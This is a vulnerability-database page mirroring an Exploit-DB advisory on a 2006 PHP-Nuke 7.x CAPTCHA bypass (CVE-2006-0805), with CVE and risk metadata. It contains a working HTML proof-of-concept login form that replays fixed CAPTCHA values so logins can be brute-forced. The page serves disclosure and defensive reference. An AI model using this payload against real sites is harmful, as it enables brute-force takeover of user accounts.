Lucene search
+L

PHP-Nuke 7.x - CAPTCHA Bypass

🗓️ 18 Feb 2006 00:00:00Reported by waraxeType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

PHP-Nuke 7.x CAPTCHA Bypass due to Design Error allows Login Brute Forc

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-0805
21 Feb 200602:00
cve
cvelist
Cvelist
CVE-2006-0805
21 Feb 200602:00
cvelist
euvd
EUVD
EUVD-2006-0811
7 Oct 202500:30
euvd
nvd
NVD
CVE-2006-0805
21 Feb 200602:02
nvd
prion
Prion
Design/Logic Flaw
21 Feb 200602:02
prion
source: https://www.securityfocus.com/bid/16722/info

The CAPTCHA implementation of PHPNuke may be bypassed by remote attackers due to a design error.


This may be used to carry out other attacks such as brute-force attempts against the login page.

[------ real life exploit ------]

<html>
<head>
<title>phpNuke CAPTHCA bypass POC</title>
</head>
<body>
<center>
<br><br><br><br>

<form action="http://localhost/nuke78/modules.php?name=Your_Account" method="post">

Username: <input type="text" name="username" size="15" maxlength="25"><br>
Password: <input type="password" name="user_password" size="15" maxlength="20"><br>

<input type="hidden" name="random_num" value="112652">
<input type="hidden" name="gfx_check" value="304380">

<input type="hidden" name="op" value="login">
<input type="submit" value="Login">

</form>
<br><br><br><br>
</center>
</body>
</html>

[----- /real life exploit ------]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Aug 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.02996
29